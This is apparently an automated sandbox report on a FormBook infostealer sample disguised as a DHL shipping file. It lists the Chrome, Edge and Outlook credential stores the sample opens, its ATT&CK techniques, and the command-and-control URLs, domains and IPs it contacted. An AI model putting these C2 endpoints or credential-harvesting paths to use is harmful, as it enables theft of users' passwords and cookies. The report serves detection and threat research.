Source: EBeVwyXzNOzYtNUOvQ.exe, 00000003.00000000.1525063714.0000000001790000.00000002.00000001.00040000.00000000.sdmp, EBeVwyXzNOzYtNUOvQ.exe, 00000003.00000002.3912475053.0000000001790000.00000002.00000001.00040000.00000000.sdmp, EBeVwyXzNOzYtNUOvQ.exe, 00000006.00000000.1673682221.0000000001AB0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: EBeVwyXzNOzYtNUOvQ.exe, 00000003.00000000.1525063714.0000000001790000.00000002.00000001.00040000.00000000.sdmp, EBeVwyXzNOzYtNUOvQ.exe, 00000003.00000002.3912475053.0000000001790000.00000002.00000001.00040000.00000000.sdmp, EBeVwyXzNOzYtNUOvQ.exe, 00000006.00000000.1673682221.0000000001AB0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: 0Program Manager
Source: EBeVwyXzNOzYtNUOvQ.exe, 00000003.00000000.1525063714.0000000001790000.00000002.00000001.00040000.00000000.sdmp, EBeVwyXzNOzYtNUOvQ.exe, 00000003.00000002.3912475053.0000000001790000.00000002.00000001.00040000.00000000.sdmp, EBeVwyXzNOzYtNUOvQ.exe, 00000006.00000000.1673682221.0000000001AB0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock

Source: C:\Users\user\Desktop\DHL 8350232025-1.exe

Code function: 0_2_001C0698 cpuid

0_2_001C0698

Source: C:\Users\user\Desktop\DHL 8350232025-1.exe

Code function: 0_2_00218195 GetLocalTime,SystemTimeToFileTime,LocalFileTimeToFileTime,GetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,

0_2_00218195

Source: C:\Users\user\Desktop\DHL 8350232025-1.exe

Code function: 0_2_001FD27A GetUserNameW,

0_2_001FD27A

Source: C:\Users\user\Desktop\DHL 8350232025-1.exe

Code function: 0_2_001DB952 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,

0_2_001DB952

Source: C:\Users\user\Desktop\DHL 8350232025-1.exe

Code function: 0_2_001A42DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_001A42DE

Stealing of Sensitive Information

Yara detected FormBook

Source: Yara match	File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.1603244254.00000000039A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1602875131.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3911918141.0000000002A10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3911851240.00000000029D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.3912815274.0000000002FC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3911205481.0000000002540000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.3913125280.0000000003930000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1603846047.0000000004C00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\SysWOW64\netbtugc.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\SysWOW64\netbtugc.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

Jump to behavior

Source: DHL 8350232025-1.exe	Binary or memory string: WIN_81
Source: DHL 8350232025-1.exe	Binary or memory string: WIN_XP
Source: DHL 8350232025-1.exe	Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.\\[\\nrt]\|%%\|%[-+ 0#]?([0-9]\|\)?(\.[0-9]\|\.\)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGGETCOUNTSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
Source: DHL 8350232025-1.exe	Binary or memory string: WIN_XPe
Source: DHL 8350232025-1.exe	Binary or memory string: WIN_VISTA
Source: DHL 8350232025-1.exe	Binary or memory string: WIN_7
Source: DHL 8350232025-1.exe	Binary or memory string: WIN_8

Remote Access Functionality

Yara detected FormBook

Source: Yara match	File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.1603244254.00000000039A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1602875131.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3911918141.0000000002A10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3911851240.00000000029D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.3912815274.0000000002FC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3911205481.0000000002540000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.3913125280.0000000003930000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1603846047.0000000004C00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

Source: C:\Users\user\Desktop\DHL 8350232025-1.exe	Code function: 0_2_00221204 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,		0_2_00221204
Source: C:\Users\user\Desktop\DHL 8350232025-1.exe	Code function: 0_2_00221806 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,		0_2_00221806

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	2 Valid Accounts	1 Native API	1 DLL Side-Loading	1 Exploitation for Privilege Escalation	1 Disable or Modify Tools	1 OS Credential Dumping	2 System Time Discovery	Remote Services	1 Archive Collected Data	4 Ingress Tool Transfer	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	Scheduled Task/Job	2 Valid Accounts	1 Abuse Elevation Control Mechanism	1 Deobfuscate/Decode Files or Information	21 Input Capture	1 Account Discovery	Remote Desktop Protocol	1 Data from Local System	1 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 DLL Side-Loading	1 Abuse Elevation Control Mechanism	Security Account Manager	2 File and Directory Discovery	SMB/Windows Admin Shares	1 Email Collection	4 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	2 Valid Accounts	3 Obfuscated Files or Information	NTDS	116 System Information Discovery	Distributed Component Object Model	21 Input Capture	4 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	21 Access Token Manipulation	1 DLL Side-Loading	LSA Secrets	241 Security Software Discovery	SSH	3 Clipboard Data	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	412 Process Injection	2 Valid Accounts	Cached Domain Credentials	12 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	12 Virtualization/Sandbox Evasion	DCSync	3 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	21 Access Token Manipulation	Proc Filesystem	11 Application Window Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	412 Process Injection	/etc/passwd and /etc/shadow	1 System Owner/User Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
DHL 8350232025-1.exe	29%	Virustotal		Browse
DHL 8350232025-1.exe	32%	ReversingLabs	Win32.Dropper.Generic
DHL 8350232025-1.exe	100%	Avira	DR/AutoIt.Gen8
DHL 8350232025-1.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Label
http://www.magmadokum.com/fo8o/?XHI=wJbPZ8pHe&bp=qL3nKp+YSjoaTomgQjyPoknaJzFflnvGMW8DXsDTZ4AADrD7Wpn1i04piMS1+AOWgCBMohpgbh6Cuut9PSzjKEsqfuFkq5cAQSWi7WA8E0wwXs8UZjiSCj3RZ8cyRYh4cA==	0%	Avira URL Cloud	safe
http://www.3xfootball.com/fo8o/?XHI=wJbPZ8pHe&bp=IhZyPQIGe6uK3zP3twZWsYVeSSeNS0ZlW2eS79Xk6ut4afzj0LiRBEeFtQixSzG192fRs1GD25A478p7nOOn1aOjYc66J7Y/iHKqqtd6zR7stgJ4hm8X7oMbvduFmUyU2g==	0%	Avira URL Cloud	safe
http://www.empowermedeco.com/fo8o/?bp=mxnR+iHPFb8HZiaBBOLBDF0OC7azb6MRPLEBGwFodGelSqoCQiBwPqu0WU7djgVoJgj4cKk6Pp6Q/yIaSghKfAZWzpPAGosIZrfQfUSvJErRFr5z6zwQDc//Mk8r+NzcRQ==&XHI=wJbPZ8pHe	0%	Avira URL Cloud	safe
http://www.elettrosistemista.zip/fo8o/?XHI=wJbPZ8pHe&bp=bO1UBvtoHFNUmlWGmXL3o3L5Dhw+Vy81qF418M7UHpKKa2cgLZsmM/SsbGGojtls67Xc6OgTo57aJm1+bsxMLyJvXbOnx1XXjd4sQOb9JZJsSiXIk2nToiXJsgHURydTcQ==	100%	Avira URL Cloud	malware
http://www.rssnewscast.com/fo8o/?bp=x3jV/ECx7FuzXOI5niBKCyXhuUkTi7THyCIVaqWvGMMqpfz0YC5wLsL1wYxwFH1KuInYTmXKqKNNujOvwtdNup0fu2K1aHG/1RRjejs3ag7ONVYGhhFLwGMDRFljOPFYJw==&XHI=wJbPZ8pHe	100%	Avira URL Cloud	malware
https://www.empowermedeco.com/fo8o/?bp=mxnR	0%	Avira URL Cloud	safe
http://www.goldenjade-travel.com/fo8o/?XHI=wJbPZ8pHe&bp=LFKqyrcu7g1NCa8cV1r2tNkohroduT6prIMLtaWgKJ9bBKQr4dsnyMPFpMQjJLGR7ieyxupOSpv1HbfUaMaF2yArpDgvi6oTdq6vPucKXgoaIsT3InbTvvq+zcnCyLgXuQ==	100%	Avira URL Cloud	malware
http://www.techchains.info/fo8o/	100%	Avira URL Cloud	malware
http://www.empowermedeco.com	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
elettrosistemista.zip	195.110.124.133	true	false	high
empowermedeco.com	217.196.55.202	true	false	high
www.3xfootball.com	154.215.72.110	true	true	unknown
www.goldenjade-travel.com	116.50.37.244	true	false	high
www.rssnewscast.com	91.195.240.94	true	true	unknown
www.techchains.info	66.29.149.46	true	true	unknown
natroredirect.natrocdn.com	85.159.66.93	true	false	high
www.magmadokum.com	unknown	unknown	true	unknown
www.donnavariedades.com	unknown	unknown	false	high
www.660danm.top	unknown	unknown	true	unknown
www.joyesi.xyz	unknown	unknown	false	high
www.liangyuen528.com	unknown	unknown	true	unknown
www.kasegitai.tokyo	unknown	unknown	true	unknown
www.empowermedeco.com	unknown	unknown	false	high
www.k9vyp11no3.cfd	unknown	unknown	true	unknown
www.elettrosistemista.zip	unknown	unknown	false	high
www.shenzhoucui.com	unknown	unknown	true	unknown
www.antonio-vivaldi.mobi	unknown	unknown	true	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://www.empowermedeco.com/fo8o/	false		high
http://www.empowermedeco.com/fo8o/?bp=mxnR+iHPFb8HZiaBBOLBDF0OC7azb6MRPLEBGwFodGelSqoCQiBwPqu0WU7djgVoJgj4cKk6Pp6Q/yIaSghKfAZWzpPAGosIZrfQfUSvJErRFr5z6zwQDc//Mk8r+NzcRQ==&XHI=wJbPZ8pHe	true	Avira URL Cloud: safe	unknown
http://www.elettrosistemista.zip/fo8o/?XHI=wJbPZ8pHe&bp=bO1UBvtoHFNUmlWGmXL3o3L5Dhw+Vy81qF418M7UHpKKa2cgLZsmM/SsbGGojtls67Xc6OgTo57aJm1+bsxMLyJvXbOnx1XXjd4sQOb9JZJsSiXIk2nToiXJsgHURydTcQ==	true	Avira URL Cloud: malware	unknown
http://www.magmadokum.com/fo8o/?XHI=wJbPZ8pHe&bp=qL3nKp+YSjoaTomgQjyPoknaJzFflnvGMW8DXsDTZ4AADrD7Wpn1i04piMS1+AOWgCBMohpgbh6Cuut9PSzjKEsqfuFkq5cAQSWi7WA8E0wwXs8UZjiSCj3RZ8cyRYh4cA==	true	Avira URL Cloud: safe	unknown
http://www.elettrosistemista.zip/fo8o/	false		high
http://www.magmadokum.com/fo8o/	false		high
http://www.rssnewscast.com/fo8o/	false		high
http://www.goldenjade-travel.com/fo8o/?XHI=wJbPZ8pHe&bp=LFKqyrcu7g1NCa8cV1r2tNkohroduT6prIMLtaWgKJ9bBKQr4dsnyMPFpMQjJLGR7ieyxupOSpv1HbfUaMaF2yArpDgvi6oTdq6vPucKXgoaIsT3InbTvvq+zcnCyLgXuQ==	true	Avira URL Cloud: malware	unknown
http://www.rssnewscast.com/fo8o/?bp=x3jV/ECx7FuzXOI5niBKCyXhuUkTi7THyCIVaqWvGMMqpfz0YC5wLsL1wYxwFH1KuInYTmXKqKNNujOvwtdNup0fu2K1aHG/1RRjejs3ag7ONVYGhhFLwGMDRFljOPFYJw==&XHI=wJbPZ8pHe	true	Avira URL Cloud: malware	unknown
http://www.goldenjade-travel.com/fo8o/	false		high
http://www.3xfootball.com/fo8o/?XHI=wJbPZ8pHe&bp=IhZyPQIGe6uK3zP3twZWsYVeSSeNS0ZlW2eS79Xk6ut4afzj0LiRBEeFtQixSzG192fRs1GD25A478p7nOOn1aOjYc66J7Y/iHKqqtd6zR7stgJ4hm8X7oMbvduFmUyU2g==	true	Avira URL Cloud: safe	unknown
http://www.techchains.info/fo8o/	true	Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://duckduckgo.com/chrome_newtab	netbtugc.exe, 00000004.00000003.1790735636.00000000079DE000.00000004.00000020.00020000.00000000.sdmp	false		high
https://duckduckgo.com/ac/?q=	netbtugc.exe, 00000004.00000003.1790735636.00000000079DE000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	netbtugc.exe, 00000004.00000003.1790735636.00000000079DE000.00000004.00000020.00020000.00000000.sdmp	false		high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	netbtugc.exe, 00000004.00000003.1790735636.00000000079DE000.00000004.00000020.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	netbtugc.exe, 00000004.00000003.1790735636.00000000079DE000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.empowermedeco.com	EBeVwyXzNOzYtNUOvQ.exe, 00000006.00000002.3912815274.0000000003013000.00000040.80000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.ecosia.org/newtab/	netbtugc.exe, 00000004.00000003.1790735636.00000000079DE000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.name.com/domain/renew/rssnewscast.com?utm_source=Sedo_parked_page&utm_medium=button&utm_	netbtugc.exe, 00000004.00000002.3916872094.0000000006120000.00000004.00000800.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.3914997202.000000000424E000.00000004.10000000.00040000.00000000.sdmp, EBeVwyXzNOzYtNUOvQ.exe, 00000006.00000002.3913740733.000000000403E000.00000004.00000001.00040000.00000000.sdmp	false		high
https://www.sedo.com/services/parking.php3	EBeVwyXzNOzYtNUOvQ.exe, 00000006.00000002.3913740733.000000000403E000.00000004.00000001.00040000.00000000.sdmp	false		high
https://ac.ecosia.org/autocomplete?q=	netbtugc.exe, 00000004.00000003.1790735636.00000000079DE000.00000004.00000020.00020000.00000000.sdmp	false		high
https://codepen.io/uzcho_/pens/popular/?grid_type=list	netbtugc.exe, 00000004.00000002.3914997202.0000000004572000.00000004.10000000.00040000.00000000.sdmp, EBeVwyXzNOzYtNUOvQ.exe, 00000006.00000002.3913740733.0000000004362000.00000004.00000001.00040000.00000000.sdmp	false		high
https://codepen.io/uzcho_/pen/eYdmdXw.css	netbtugc.exe, 00000004.00000002.3914997202.0000000004572000.00000004.10000000.00040000.00000000.sdmp, EBeVwyXzNOzYtNUOvQ.exe, 00000006.00000002.3913740733.0000000004362000.00000004.00000001.00040000.00000000.sdmp	false		high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	netbtugc.exe, 00000004.00000003.1790735636.00000000079DE000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.empowermedeco.com/fo8o/?bp=mxnR	netbtugc.exe, 00000004.00000002.3914997202.0000000004BBA000.00000004.10000000.00040000.00000000.sdmp, EBeVwyXzNOzYtNUOvQ.exe, 00000006.00000002.3913740733.00000000049AA000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	netbtugc.exe, 00000004.00000003.1790735636.00000000079DE000.00000004.00000020.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
91.195.240.94	www.rssnewscast.com	Germany	47846	SEDO-ASDE	true
154.215.72.110	www.3xfootball.com	Seychelles	132839	POWERLINE-AS-APPOWERLINEDATACENTERHK	true
195.110.124.133	elettrosistemista.zip	Italy	39729	REGISTER-ASIT	false
116.50.37.244	www.goldenjade-travel.com	Taiwan; Republic of China (ROC)	18046	DONGFONG-TWDongFongTechnologyCoLtdTW	false
85.159.66.93	natroredirect.natrocdn.com	Turkey	34619	CIZGITR	false
66.29.149.46	www.techchains.info	United States	19538	ADVANTAGECOMUS	true
217.196.55.202	empowermedeco.com	Norway	29300	AS-DIRECTCONNECTNO	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1584795
Start date and time:	2025-01-06 14:31:14 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 10m 33s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	10
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	2
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	DHL 8350232025-1.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@7/2@15/7
EGA Information:	Successful, ratio: 75%
HCA Information:	Successful, ratio: 90% Number of executed functions: 43 Number of non-executed functions: 306
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
Excluded IPs from analysis (whitelisted): 172.202.163.200, 13.107.246.45
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing disassembly code.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
08:33:08	API Interceptor	10643757x Sleep call for process: netbtugc.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
91.195.240.94	DHL 745-12302024.exe	Get hash	malicious	FormBook	Browse	www.rssnewscast.com/fo8o/
	DHL 806-232024.exe	Get hash	malicious	FormBook	Browse	www.rssnewscast.com/fo8o/
	DHL 0737-12182024.exe	Get hash	malicious	FormBook	Browse	www.rssnewscast.com/fo8o/
	DHL 073412182024.exe	Get hash	malicious	FormBook	Browse	www.rssnewscast.com/fo8o/
	236236236.elf	Get hash	malicious	Unknown	Browse	suboyule.736t.com/
	DHL 40312052024.exe	Get hash	malicious	FormBook	Browse	www.rssnewscast.com/fo8o/
	DHL 30312052024.exe	Get hash	malicious	FormBook	Browse	www.rssnewscast.com/fo8o/
	CCE 30411252024.exe	Get hash	malicious	FormBook	Browse	www.rssnewscast.com/fo8o/
	Certificate 11-18720.exe	Get hash	malicious	FormBook	Browse	www.rssnewscast.com/fo8o/
	Certificate 11-19AIS.exe	Get hash	malicious	FormBook	Browse	www.rssnewscast.com/fo8o/
154.215.72.110	wOoESPII08.exe	Get hash	malicious	FormBook	Browse	www.3xfootball.com/fo8o/?xVY=IhZyPQIGe6uK3zP3twZWsYVeSSeNS0ZlW2eS79Xk6ut4afzj0LiRBEeFtQixSzG192fRs1GD25A478p7nOOnj6KtR967KJkZjHO4n68kz2fsmRVZ8Q==&Nz=LPhpDRap3
	N2sgk6jMa2.exe	Get hash	malicious	FormBook	Browse	www.3xfootball.com/fo8o/?qD=FrMTb&aZ=IhZyPQIGe6uK3zPwzgZotr9BPg6ZX3xlW2eS79Xk6ut4afzj0LiRBEeFtQixSzG192fRs1GD25A478p7nOOn1bCAV966J7ZkoXS5ptBuz2edhBZoh3xN24c=
	Document 151-512024.exe	Get hash	malicious	FormBook	Browse	www.3xfootball.com/fo8o/?4h8=YPQX8Tch&FBEd=IhZyPQIGe6uK3zP3twZWsYVeSSeNS0ZlW2eS79Xk6ut4afzj0LiRBEeFtQixSzG192fRs1GD25A478p7nOOnzPSqftK5Z9AZjHO4n69vlG+dhBZ38Q==
195.110.124.133	DHL 745-12302024.exe	Get hash	malicious	FormBook	Browse	www.elettrosistemista.zip/fo8o/
	DHL 806-232024.exe	Get hash	malicious	FormBook	Browse	www.elettrosistemista.zip/fo8o/
	DHL 0737-12182024.exe	Get hash	malicious	FormBook	Browse	www.elettrosistemista.zip/fo8o/
	DHL 073412182024.exe	Get hash	malicious	FormBook	Browse	www.elettrosistemista.zip/fo8o/
	DHL 40312052024.exe	Get hash	malicious	FormBook	Browse	www.elettrosistemista.zip/fo8o/
	DHL 30312052024.exe	Get hash	malicious	FormBook	Browse	www.elettrosistemista.zip/fo8o/
	SRT68.exe	Get hash	malicious	FormBook	Browse	www.officinadelpasso.shop/io9k/
	CCE 30411252024.exe	Get hash	malicious	FormBook	Browse	www.elettrosistemista.zip/fo8o/
	Certificate 11-18720.exe	Get hash	malicious	FormBook	Browse	www.elettrosistemista.zip/fo8o/
	Certificate 11-19AIS.exe	Get hash	malicious	FormBook	Browse	www.elettrosistemista.zip/fo8o/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
www.3xfootball.com	DHL 745-12302024.exe	Get hash	malicious	FormBook	Browse	154.215.72.110
	DHL 806-232024.exe	Get hash	malicious	FormBook	Browse	154.215.72.110
	DHL 0737-12182024.exe	Get hash	malicious	FormBook	Browse	154.215.72.110
	DHL 073412182024.exe	Get hash	malicious	FormBook	Browse	154.215.72.110
	DHL 40312052024.exe	Get hash	malicious	FormBook	Browse	154.215.72.110
	DHL 30312052024.exe	Get hash	malicious	FormBook	Browse	154.215.72.110
	CCE 30411252024.exe	Get hash	malicious	FormBook	Browse	154.215.72.110
	Certificate 11-18720.exe	Get hash	malicious	FormBook	Browse	154.215.72.110
	Certificate 11-19AIS.exe	Get hash	malicious	FormBook	Browse	154.215.72.110
	Certificate 11-21AIS.exe	Get hash	malicious	FormBook	Browse	154.215.72.110
www.goldenjade-travel.com	DHL 745-12302024.exe	Get hash	malicious	FormBook	Browse	116.50.37.244
	DHL 806-232024.exe	Get hash	malicious	FormBook	Browse	116.50.37.244
	DHL 0737-12182024.exe	Get hash	malicious	FormBook	Browse	116.50.37.244
	DHL 073412182024.exe	Get hash	malicious	FormBook	Browse	116.50.37.244
	DHL 40312052024.exe	Get hash	malicious	FormBook	Browse	116.50.37.244
	DHL 30312052024.exe	Get hash	malicious	FormBook	Browse	116.50.37.244
	CCE 30411252024.exe	Get hash	malicious	FormBook	Browse	116.50.37.244
	Certificate 11-18720.exe	Get hash	malicious	FormBook	Browse	116.50.37.244
	Certificate 11-19AIS.exe	Get hash	malicious	FormBook	Browse	116.50.37.244
	Certificate 11-21AIS.exe	Get hash	malicious	FormBook	Browse	116.50.37.244

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
POWERLINE-AS-APPOWERLINEDATACENTERHK	i686.elf	Get hash	malicious	Mirai	Browse	156.244.6.20
	z0r0.spc.elf	Get hash	malicious	Mirai	Browse	156.242.206.56
	i686.elf	Get hash	malicious	Mirai	Browse	156.244.6.20
	3.elf	Get hash	malicious	Unknown	Browse	154.89.139.24
	PKHDJwnF0I.exe	Get hash	malicious	GhostRat	Browse	156.251.17.243
	8R2YjBA8nI.exe	Get hash	malicious	GhostRat	Browse	156.251.17.243
	Hilix.ppc.elf	Get hash	malicious	Mirai	Browse	45.202.220.139
	Hilix.sh4.elf	Get hash	malicious	Mirai	Browse	45.202.220.141
	DHL 745-12302024.exe	Get hash	malicious	FormBook	Browse	154.215.72.110
